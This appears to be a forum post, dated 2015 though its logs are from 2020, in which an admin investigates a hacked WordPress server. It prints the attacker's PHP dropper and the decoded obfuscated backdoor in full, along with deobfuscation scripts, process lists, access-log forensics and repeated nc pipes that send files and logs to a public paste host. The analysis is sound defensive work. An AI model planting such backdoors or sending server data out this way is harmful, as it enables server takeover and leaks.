- Apr 25, 2015
First, what am I doing?
Code:
cd /tmp/
cat * | nc termbin.com 9999
Taking this off to another machine for inspection, volatile data:
Code:
a:2:{s:14:"162.158.89.172";a:2:{i:0;i:1577805458;i:1;i:1;}s:14:"162.158.91.230";a:2:{i:0;i:1577805459;i:1;i:1;}}<?php echo ":#009009#:";
// Walk the web root (plus whatever path arrives in ?ptz=) looking for sitemap.xml files,
// read each hosted site's URL from its <loc> entry and drop wp-craft-report-site.php beside it.
$file_to_search = "sitemap.xml";
$dop = $_GET['ptz'];
@search_file($_SERVER['DOCUMENT_ROOT'].$dop,$file_to_search);
function search_file($dir,$file_to_search){
    $search_array = array();
    $files = scandir($dir);
    foreach($files as $key => $value){
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
        if(!is_dir($path)) {
            if (strpos($value,$file_to_search) !== false) {
                $sitename = get_sitename($path);
                if($sitename != "null") {
                    if (!array_key_exists($sitename, $search_array)) {
                        $st = make_sh_site(dirname($path),$sitename);
                        array_push($search_array, $sitename);
                    }
                }
            }
        } else if($value != "." && $value != "..") {
            search_file($path, $file_to_search);   // recurse into subdirectories
        }
    }
}
// Returns scheme and host of the first <loc> URL in the sitemap, or "null".
function get_sitename($file) {
    $g = file_get_contents($file);
    if (strpos($g,"<loc>") !== false) {
        preg_match('/<loc>(.*?)<\/loc>/s', $g, $matches, PREG_OFFSET_CAPTURE);
        $siten = $matches[1][0];
        $siten_t = str_replace("://","@",$siten);
        $pieces = explode("/", $siten_t);
        $siten_t3 = str_replace("@","://",$pieces[0]);
        return $siten_t3;
    }
    return "null";
}
// Writes the base64-encoded backdoor next to the sitemap, then fetches it over HTTP.
// Reached without its POST parameters the dropped file prints "404--error", so that
// marker tells the operator the file is live; the response is echoed back to them.
function make_sh_site($dir,$site_name) {
    @file_put_contents($dir."/wp-craft-report-site.php",base64_decode('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'));
    $r = @file_get_contents($site_name."/wp-craft-report-site.php");
    if(strpos($r,"404--error") !== false){
        echo $site_name."/wp-craft-report-site.php<#>";
        return;
    }
    return $site_name;
}
echo "#already exist#:";
Okay, now I am not a dumb mother fuXXr - right? I know to grep for "decode" among "eval" and other kiddo commands.
So, I am looking at wp-craft-report-site.php with the base64. Let's decode?
Code:
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
Base64 decodes to:
Code:
<?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110); $n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } else { $cbb = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); echo $cbb(chr(78).chr(68).chr(65).chr(48).chr(76).chr(83).chr(49).chr(108).chr(99).chr(110).chr(74).chr(118).chr(99).chr(103).chr(61).chr(61)); }
Awesome, more obfuscation.
Now we want to turn all these damn chr(1337)s to their actual character. Cool! Nice site over here does this stuff for us: https://www.plus2net.com/php_tutorial/string-chr.php
This is going to get fucking dumb.
Time 2 code PHP to create a bash script for us, lmao.. because fuck this.
Over here http://www.writephponline.com/ I am going to execute:
PHP:
<?php
// Print a chr(N) = character lookup table, 20 rows per column
// (the posted loop used $i==0, a comparison, where the initialiser $i=0 belongs)
echo "<table><tr><td>";
for($i=0;$i<=127;$i++){
    echo " chr($i) = ".chr($i)."<br>";
    if($i%20 == 0 and $i>19){echo "</td><td valign=top>";}
}
echo "</td></tr></table>";
?>
Write the PHP you want to decode into a decode.txt file!
We can generate this by modifying:
Code:
sed -i 's/chr(0)//g' ./decode.txt
sed -i 's/chr(1)//g' ./decode.txt
sed -i 's/chr(2)//g' ./decode.txt
sed -i 's/chr(3)//g' ./decode.txt
sed -i 's/chr(4)//g' ./decode.txt
sed -i 's/chr(5)//g' ./decode.txt
sed -i 's/chr(6)//g' ./decode.txt
sed -i 's/chr(7)//g' ./decode.txt
sed -i 's/chr(8)//g' ./decode.txt
sed -i 's/chr(9)/ /g' ./decode.txt
sed -i 's/chr(10)/ /g' ./decode.txt
sed -i 's/chr(11)//g' ./decode.txt
sed -i 's/chr(12)//g' ./decode.txt
sed -i 's/chr(13)/ /g' ./decode.txt
sed -i 's/chr(14)//g' ./decode.txt
sed -i 's/chr(15)//g' ./decode.txt
sed -i 's/chr(16)//g' ./decode.txt
sed -i 's/chr(17)//g' ./decode.txt
sed -i 's/chr(18)//g' ./decode.txt
sed -i 's/chr(19)//g' ./decode.txt
sed -i 's/chr(20)//g' ./decode.txt
sed -i 's/chr(21)//g' ./decode.txt
sed -i 's/chr(22)//g' ./decode.txt
sed -i 's/chr(23)//g' ./decode.txt
sed -i 's/chr(24)//g' ./decode.txt
sed -i 's/chr(25)//g' ./decode.txt
sed -i 's/chr(26)//g' ./decode.txt
sed -i 's/chr(27)//g' ./decode.txt
sed -i 's/chr(28)//g' ./decode.txt
sed -i 's/chr(29)//g' ./decode.txt
sed -i 's/chr(30)//g' ./decode.txt
sed -i 's/chr(31)//g' ./decode.txt
sed -i 's/chr(32)/ /g' ./decode.txt
sed -i 's/chr(33)/!/g' ./decode.txt
sed -i 's/chr(34)/"/g' ./decode.txt
sed -i 's/chr(35)/#/g' ./decode.txt
sed -i 's/chr(36)/$/g' ./decode.txt
sed -i 's/chr(37)/%/g' ./decode.txt
sed -i 's/chr(38)/\&/g' ./decode.txt
sed -i "s/chr(39)/'/g" ./decode.txt
sed -i 's/chr(40)/(/g' ./decode.txt
sed -i 's/chr(41)/)/g' ./decode.txt
sed -i 's/chr(42)/*/g' ./decode.txt
sed -i 's/chr(43)/+/g' ./decode.txt
sed -i 's/chr(44)/,/g' ./decode.txt
sed -i 's/chr(45)/-/g' ./decode.txt
sed -i 's/chr(46)/./g' ./decode.txt
sed -i 's/chr(47)/\//g' ./decode.txt
sed -i 's/chr(48)/0/g' ./decode.txt
sed -i 's/chr(49)/1/g' ./decode.txt
sed -i 's/chr(50)/2/g' ./decode.txt
sed -i 's/chr(51)/3/g' ./decode.txt
sed -i 's/chr(52)/4/g' ./decode.txt
sed -i 's/chr(53)/5/g' ./decode.txt
sed -i 's/chr(54)/6/g' ./decode.txt
sed -i 's/chr(55)/7/g' ./decode.txt
sed -i 's/chr(56)/8/g' ./decode.txt
sed -i 's/chr(57)/9/g' ./decode.txt
sed -i 's/chr(58)/:/g' ./decode.txt
sed -i 's/chr(59)/;/g' ./decode.txt
sed -i 's/chr(62)/>/g' ./decode.txt
sed -i 's/chr(63)/?/g' ./decode.txt
sed -i 's/chr(64)/@/g' ./decode.txt
sed -i 's/chr(65)/A/g' ./decode.txt
sed -i 's/chr(66)/B/g' ./decode.txt
sed -i 's/chr(67)/C/g' ./decode.txt
sed -i 's/chr(68)/D/g' ./decode.txt
sed -i 's/chr(69)/E/g' ./decode.txt
sed -i 's/chr(70)/F/g' ./decode.txt
sed -i 's/chr(71)/G/g' ./decode.txt
sed -i 's/chr(72)/H/g' ./decode.txt
sed -i 's/chr(73)/I/g' ./decode.txt
sed -i 's/chr(74)/J/g' ./decode.txt
sed -i 's/chr(75)/K/g' ./decode.txt
sed -i 's/chr(76)/L/g' ./decode.txt
sed -i 's/chr(77)/M/g' ./decode.txt
sed -i 's/chr(78)/N/g' ./decode.txt
sed -i 's/chr(79)/O/g' ./decode.txt
sed -i 's/chr(80)/P/g' ./decode.txt
sed -i 's/chr(81)/Q/g' ./decode.txt
sed -i 's/chr(82)/R/g' ./decode.txt
sed -i 's/chr(83)/S/g' ./decode.txt
sed -i 's/chr(84)/T/g' ./decode.txt
sed -i 's/chr(85)/U/g' ./decode.txt
sed -i 's/chr(86)/V/g' ./decode.txt
sed -i 's/chr(87)/W/g' ./decode.txt
sed -i 's/chr(88)/X/g' ./decode.txt
sed -i 's/chr(89)/Y/g' ./decode.txt
sed -i 's/chr(90)/Z/g' ./decode.txt
sed -i 's/chr(91)/[/g' ./decode.txt
sed -i 's/chr(92)/\\/g' ./decode.txt
sed -i 's/chr(93)/]/g' ./decode.txt
sed -i 's/chr(94)/^/g' ./decode.txt
sed -i 's/chr(95)/_/g' ./decode.txt
sed -i 's/chr(96)/`/g' ./decode.txt
sed -i 's/chr(97)/a/g' ./decode.txt
sed -i 's/chr(98)/b/g' ./decode.txt
sed -i 's/chr(99)/c/g' ./decode.txt
sed -i 's/chr(100)/d/g' ./decode.txt
sed -i 's/chr(101)/e/g' ./decode.txt
sed -i 's/chr(102)/f/g' ./decode.txt
sed -i 's/chr(103)/g/g' ./decode.txt
sed -i 's/chr(104)/h/g' ./decode.txt
sed -i 's/chr(105)/i/g' ./decode.txt
sed -i 's/chr(106)/j/g' ./decode.txt
sed -i 's/chr(107)/k/g' ./decode.txt
sed -i 's/chr(108)/l/g' ./decode.txt
sed -i 's/chr(109)/m/g' ./decode.txt
sed -i 's/chr(110)/n/g' ./decode.txt
sed -i 's/chr(111)/o/g' ./decode.txt
sed -i 's/chr(112)/p/g' ./decode.txt
sed -i 's/chr(113)/q/g' ./decode.txt
sed -i 's/chr(114)/r/g' ./decode.txt
sed -i 's/chr(115)/s/g' ./decode.txt
sed -i 's/chr(116)/t/g' ./decode.txt
sed -i 's/chr(117)/u/g' ./decode.txt
sed -i 's/chr(118)/v/g' ./decode.txt
sed -i 's/chr(119)/w/g' ./decode.txt
sed -i 's/chr(120)/x/g' ./decode.txt
sed -i 's/chr(121)/y/g' ./decode.txt
sed -i 's/chr(122)/z/g' ./decode.txt
sed -i 's/chr(123)/{/g' ./decode.txt
sed -i 's/chr(124)/|/g' ./decode.txt
sed -i 's/chr(125)/}/g' ./decode.txt
sed -i 's/chr(126)/~/g' ./decode.txt
sed -i 's/chr(127)//g' ./decode.txt
Code:
<?php
// Emit one sed substitution per ASCII code so every chr(N) in decode.txt becomes
// the literal character. The posted version printed / \ & and ' unescaped, which
// breaks those four sed commands (and is why chr(47) survives in the decoded
// output further down); here they are escaped. Control characters are dropped,
// except tab/newline/CR which become a space.
for($i=0;$i<=127;$i++){
    $c = chr($i);
    if($i < 32 || $i == 127){ $c = ($i == 9 || $i == 10 || $i == 13) ? " " : ""; }
    $c = str_replace(array("\\", "/", "&"), array("\\\\", "\\/", "\\&"), $c);
    if($c == "'"){ $c = "'\\''"; }   // close the single-quoted script, escaped quote, reopen
    echo "sed -i 's/chr($i)/".$c."/g' ./decode.txt\n";
}
?>
Ghetttttoo PHP shytufff for fun, woo.
Results?
Code:
cat decode.txt
<?php if(isset($_POST[a.s.a.v.s.d.v.d.s]) && md5($_POST[l.g.k.f.g.h.d.f.h]) == e.9.7.8.7.a.d.c.5.2.7.1.c.b.0.f.7.6.5.2.9.4.5.0.3.d.a.3.f.2.d.c) { $a = m.n; $n1 = f.i.l.e._;$n2 = p.u.t._;$n3 = $n1.$n2.c.o.n.t.e.n.t.s;$b1 = d.e.c.o.d.e;$b2 = b.a.s.e.6.4._.$b1; $z1 = chr(60).?.p.h.p. ; $z2 = $z1.$b2($_REQUEST[d.1]); $z3 = $b2($_REQUEST[d.1]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).t.m.p.chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } else { $cbb = b.a.s.e.6.4._.d.e.c.o.d.e; echo $cbb(N.D.A.0.L.S.1.l.c.n.J.v.c.g.chr(61).chr(61)); }
Just about every usage of "." is for combining the chr(1).chr(2) shit. Know what I should have done first? Remove "." anywhere between ) and c, fuck. Regex for the win.
I don't have patience for regex, so I am using Notepad++ to search for and replace "." with "" nothing.
Code:
<?php if(isset($_POST[asavsdvds]) && md5($_POST[lgkfghdfh]) == e9787adc5271cb0f765294503da3f2dc) { $a = mn; $n1 = file_;$n2 = put_;$n3 = $n1$n2contents;$b1 = decode;$b2 = base64_$b1; $z1 = chr(60)?php ; $z2 = $z1$b2($_REQUEST[d1]); $z3 = $b2($_REQUEST[d1]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47)tmpchr(47)$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } else { $cbb = base64_decode; echo $cbb(NDA0LS1lcnJvcgchr(61)chr(61)); }
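A regex-based version of the same cleanup, added here as an example and not code from the original post: it folds each chr(N) run into one literal but leaves the dots between variables alone, which is the case the blanket delete-every-dot replace above gets wrong (`$n1$n2contents`), then constant-folds the assignments so the calls made through variables resolve to their real function names. `SAMPLE` is a constructed fragment in the style of the decoded snippet, and the watchlist of function names is mine.

```python
"""Deobfuscate chr()-concatenation PHP and resolve calls made through variables.

Added analysis example, not code from the original post. SAMPLE is a
constructed fragment in the style of the snippet above, not the complete file.
"""
import re

# One chr(N) call, and a run of them joined by PHP's "." operator: chr(97).chr(115)
CHR_CODE = re.compile(r"chr\(\s*(\d{1,3})\s*\)")
CHR_RUN = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\))*")
# $name = <expr>;  (assumes no ';' inside string literals, true for this style)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;]+);")
# A call through a variable: $n3(...) or @$n3(...)
VAR_CALL = re.compile(r"@?\$(\w+)\s*\(")
# Tokens of a pure string-building expression: single-quoted literals and variables
TOK = r"'(?:[^'\\]|\\.)*'|\$\w+"
TOKEN = re.compile(TOK)
CONCAT_EXPR = re.compile(r"\s*(?:%s)(?:\s*\.\s*(?:%s))*\s*$" % (TOK, TOK))

# Function names worth flagging when reached indirectly through a variable (my list)
WATCHLIST = {"file_put_contents", "base64_decode", "include", "eval", "assert",
             "system", "exec", "shell_exec", "passthru", "unlink"}


def _php_quote(s):
    """Wrap s as a PHP single-quoted literal (only backslash and ' need escaping)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def _php_unquote(lit):
    inner = lit.strip()[1:-1]
    return inner.replace("\\'", "'").replace("\\\\", "\\")


def fold_chr(src):
    """Turn every chr(a).chr(b)... run into one literal.

    Only the dots *between chr() calls* are consumed, so $n1.$n2.'contents'
    keeps its concatenation operators; deleting every '.' in the file also
    breaks $n1.$n2 and any literal '.' character.
    """
    def repl(m):
        codes = [int(c) for c in CHR_CODE.findall(m.group(0))]
        return _php_quote("".join(chr(c) for c in codes))
    return CHR_RUN.sub(repl, src)


def resolve_variables(src):
    """Constant-fold assignments such as $b2 = 'base64_'.$b1; in source order.

    Returns {name: value} for every variable whose value is fully known;
    expressions containing calls or unknown variables are skipped.
    """
    values = {}
    for name, expr in ASSIGN.findall(src):
        if not CONCAT_EXPR.match(expr):
            continue
        parts = []
        for tok in TOKEN.findall(expr):
            if tok.startswith("$"):
                if tok[1:] not in values:
                    parts = None
                    break
                parts.append(values[tok[1:]])
            else:
                parts.append(_php_unquote(tok))
        if parts is not None:
            values[name] = "".join(parts)
    return values


def flag_variable_calls(src, values):
    """List (variable, resolved function) pairs whose target is on WATCHLIST."""
    hits = set()
    for name in VAR_CALL.findall(src):
        target = values.get(name)
        if target in WATCHLIST:
            hits.add((name, target))
    return sorted(hits)


# Constructed fragment in the style of the decoded snippet above.
SAMPLE = (
    "$a = chr(109).chr(110); "
    "$n1 = chr(102).chr(105).chr(108).chr(101).chr(95);"
    "$n2 = chr(112).chr(117).chr(116).chr(95);"
    "$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);"
    "$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);"
    "$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; "
    "$z2 = $b2($_REQUEST[chr(100).chr(49)]); "
    "@$n3($a,$z2); @include($a);"
)

if __name__ == "__main__":
    folded = fold_chr(SAMPLE)
    print(folded)
    resolved = resolve_variables(folded)
    for name, target in flag_variable_calls(folded, resolved):
        print("$%s(...) resolves to %s" % (name, target))
```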
Apparently Ben from Sucuri already found this shit:
Backdoor Found in Compromised WordPress Environment (labs.sucuri.net): our researcher describes a backdoor in a compromised WordPress installation that had been injected into the header.php file in the theme directory.
I found a piece of this artifact over at:
Code:
./wp-content/cache/supercache/MY_CLIENTS_WEB_DOMAIN.com/wp-craft-report.php
What about running processes?
Code:
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 2019 ? 00:02:34 init [2]
root 2 0 0 2019 ? 00:00:00 [kthreadd]
root 3 2 0 2019 ? 00:06:41 [ksoftirqd/0]
root 5 2 0 2019 ? 00:00:00 [kworker/u:0]
root 6 2 0 2019 ? 00:00:00 [migration/0]
root 7 2 0 2019 ? 00:01:07 [watchdog/0]
root 8 2 0 2019 ? 00:00:00 [cpuset]
root 9 2 0 2019 ? 00:00:00 [khelper]
root 10 2 0 2019 ? 00:00:00 [kdevtmpfs]
root 11 2 0 2019 ? 00:00:00 [netns]
root 12 2 0 2019 ? 00:00:33 [sync_supers]
root 13 2 0 2019 ? 00:00:00 [bdi-default]
root 14 2 0 2019 ? 00:00:00 [kintegrityd]
root 15 2 0 2019 ? 00:00:00 [kblockd]
root 17 2 0 2019 ? 00:00:05 [khungtaskd]
root 18 2 0 2019 ? 00:00:03 [kswapd0]
root 19 2 0 2019 ? 00:00:00 [vmstat]
root 20 2 0 2019 ? 00:00:00 [ksmd]
root 21 2 0 2019 ? 00:00:00 [khugepaged]
root 22 2 0 2019 ? 00:00:00 [fsnotify_mark]
root 23 2 0 2019 ? 00:00:00 [crypto]
root 84 2 0 2019 ? 00:00:00 [khubd]
root 94 2 0 2019 ? 00:00:00 [ata_sff]
root 110 2 0 2019 ? 00:00:00 [scsi_eh_0]
root 111 2 0 2019 ? 00:00:00 [scsi_eh_1]
root 118 2 0 2019 ? 00:00:00 [kworker/u:1]
root 140 2 0 2019 ? 00:03:28 [kjournald]
root 295 1 0 2019 ? 00:00:00 udevd --daemon
root 401 295 0 2019 ? 00:00:00 udevd --daemon
root 402 295 0 2019 ? 00:00:00 udevd --daemon
root 404 2 0 2019 ? 00:00:00 [kpsmoused]
root 418 2 0 2019 ? 00:23:01 [vballoon]
root 1812 1 0 2019 ? 00:11:54 /usr/sbin/rsyslogd -c5
root 1897 2 0 2019 ? 00:01:13 [flush-254:0]
root 1903 1 0 2019 ? 00:00:37 /usr/sbin/cron
root 2357 1 0 2019 ? 00:06:32 sendmail: MTA: accepting connections
root 2593 1 0 2019 ? 00:08:25 /usr/sbin/sshd
root 2617 1 0 2019 tty1 00:00:00 /sbin/getty 38400 tty1
root 2618 1 0 2019 tty2 00:00:00 /sbin/getty 38400 tty2
root 2619 1 0 2019 tty3 00:00:00 /sbin/getty 38400 tty3
root 2620 1 0 2019 tty4 00:00:00 /sbin/getty 38400 tty4
root 2621 1 0 2019 tty5 00:00:00 /sbin/getty 38400 tty5
root 2622 1 0 2019 tty6 00:00:00 /sbin/getty 38400 tty6
root 5321 1 0 2019 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql 5648 5321 0 2019 ? 01:06:55 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 5649 5321 0 2019 ? 00:00:00 logger -t mysqld -p daemon.error
root 31247 1 0 Jan04 ? 00:02:37 /usr/sbin/apache2 -k start
www-data 23249 31247 0 Feb04 ? 00:00:14 /usr/sbin/apache2 -k start
www-data 24323 31247 0 Feb04 ? 00:00:10 /usr/sbin/apache2 -k start
www-data 27536 31247 0 Feb04 ? 00:00:10 /usr/sbin/apache2 -k start
www-data 27569 31247 0 Feb04 ? 00:00:11 /usr/sbin/apache2 -k start
www-data 27571 31247 0 Feb04 ? 00:00:09 /usr/sbin/apache2 -k start
www-data 27572 31247 0 Feb04 ? 00:00:08 /usr/sbin/apache2 -k start
www-data 27574 31247 0 Feb04 ? 00:00:11 /usr/sbin/apache2 -k start
www-data 27576 31247 0 Feb04 ? 00:00:11 /usr/sbin/apache2 -k start
www-data 27579 31247 0 Feb04 ? 00:00:10 /usr/sbin/apache2 -k start
www-data 29049 31247 0 Feb04 ? 00:00:07 /usr/sbin/apache2 -k start
root 16761 2 0 Feb05 ? 00:00:04 [kworker/0:0]
root 25372 2 0 Feb06 ? 00:00:02 [kworker/0:1]
root 13393 2593 0 13:43 ? 00:00:01 sshd: root@pts/0
root 13401 13393 0 13:43 pts/0 00:00:02 -bash
root 14266 13401 0 14:16 pts/0 00:00:00 mail
root 14371 13401 0 14:20 pts/0 00:00:00 ps -ef --sort=start_time
root 14372 13401 0 14:20 pts/0 00:00:00 nc termbin.com 9999
Pay close attention to this Feb04/05/06 shit.. hmm. kk
cd /var/log
Now who has logged in?
Code:
grep -rnw './' -e 'Accepted password'
Nice m8, but what about inside of the zipped files?
Code:
root@vps91709:/var/log# zgrep -a Feb *gz | grep -v "root" | grep -v "sendmail" | grep -v "STARTTLS" | grep -v "localhost" | grep -v "CUSTOMER_NAME_HERE" | grep -v "mailer" | grep "kernel"
syslog.3.gz:Feb 4 12:56:34 vps91709 kernel: [11316599.087732] UDP: bad checksum. From 51.255.109.163:53592 to 158.69.206.75:5060 ulen 237
Hey, fuck you UDP protocol packet fuqqer.
-rw-r--r-- 1 www-data www-data 3.3K Feb 3 16:09 mn
We have a timeframe: our compromise began on Feb 3.
Now since I know this attack happened around a specific time, I can scrape my logs around then:
Code:
cat * | grep "03/Feb/2020:16:09" | nc termbin.com 9999
We know this hit my Apache server, so let's cd in there before running the above: "cd /var/log/apache2", then run the above.
Code:
162.158.74.102 - - [03/Feb/2020:16:09:19 -0500] "GET / HTTP/1.1" 200 6634 "-" "-"
108.162.216.45 - - [03/Feb/2020:16:09:20 -0500] "GET / HTTP/1.1" 200 6630 "-" "-"
162.158.74.246 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6653 "-" "-"
108.162.216.81 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"
141.101.77.11 - - [03/Feb/2020:16:09:18 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
108.162.216.131 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6646 "-" "-"
162.158.74.134 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"
162.158.74.250 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6631 "-" "-"
162.158.74.66 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6641 "-" "-"
141.101.77.11 - - [03/Feb/2020:16:09:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
::1 - - [03/Feb/2020:16:09:30 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
::1 - - [03/Feb/2020:16:09:31 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "GET /wp-login.php HTTP/1.1" 200 2265 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"
172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "POST /wp-login.php HTTP/1.1" 200 2659 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"
141.101.104.224 - - [03/Feb/2020:16:09:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
172.69.55.163 - - [03/Feb/2020:16:09:56 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
172.69.55.79 - - [03/Feb/2020:16:09:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
::1 - - [03/Feb/2020:16:09:58 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
163.172.44.118 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"
108.162.229.179 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 200 6645 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"
This fuqqer infected me last time, and I overlooked this infection when clearing it off.
See this bullshit?
Now we know Dec 10 17:07 is a time of interest..
Code:
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /admin
I am tracing this attack back to Cloudflare, but this is not Cloudflare's fault, this is my own damn fault for not enabling the Cloudflare module to have the attacker's real fuqqqking IP logged. I know they're from around the Germany/Netherlands/Europe region though, since the CDN location they came through is in that direction.
So I am going to grep for "172.69" and "162.158"
...
zgrep -a "10/Dec/2019:17:0" *gz | grep "172.69"
and
zgrep -a "10/Dec/2019:17:0" *gz | grep "162.158"
I am obviously going to add | nc termbin.com 9999 to exfil these logs.
Code:
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:30 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
